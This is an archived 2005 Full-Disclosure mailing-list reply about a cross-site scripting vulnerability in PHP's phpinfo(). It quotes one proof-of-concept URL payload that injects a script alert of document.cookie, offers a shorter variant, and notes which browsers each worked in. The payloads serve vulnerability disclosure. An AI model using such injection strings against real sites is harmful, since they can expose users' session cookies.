[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] PoC for PHP Cross Site Scripting (XSS)XVulnerability in phpinfo()

To: Full Disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] PoC for PHP Cross Site Scripting (XSS)XVulnerability in phpinfo()
From: Moritz Naumann <security@xxxxxxxxxxxxxxxxxx>
Date: Fri, 04 Nov 2005 12:23:42 +0100

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

phole@xxxxxxxxxxxx schrieb:
> PoC:
> phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>

...or just use
phpinfo.php?[]=<script>alert(document.cookie);</script>

Saves some typing. In contrary to the above, this one only works on IE
(tested 6 on XP SP2) & Konqueror (tested 3.4.2), though.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDa0S+n6GkvSd/BgwRAr56AJ0aSs+7n00IdUk6HQRd+Akwe2EJIgCeOIm9
eLVPXP/uSdLOxg5/w1pB2no=
=C/qI
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- Re: [Full-disclosure] Advisory 18/2005: PHP Cross Site Scripting (XSS)XVulnerability in phpinfo()
  - From: phole

Prev by Date: [Full-disclosure] [SECURITY] [DSA 881-1] New OpenSSL 0.9.6 packages fix cryptographic weakness
Next by Date: [Full-disclosure] [SECURITY] [DSA 882-1] New OpenSSL packages fix cryptographic weakness
Previous by thread: Re: [Full-disclosure] Advisory 18/2005: PHP Cross Site Scripting (XSS)XVulnerability in phpinfo()
Next by thread: Re: [Full-disclosure] Advisory 18/2005: PHP Cross Site Scripting (XSS)XVulnerability in phpinfo()
Index(es):
- Date
- Thread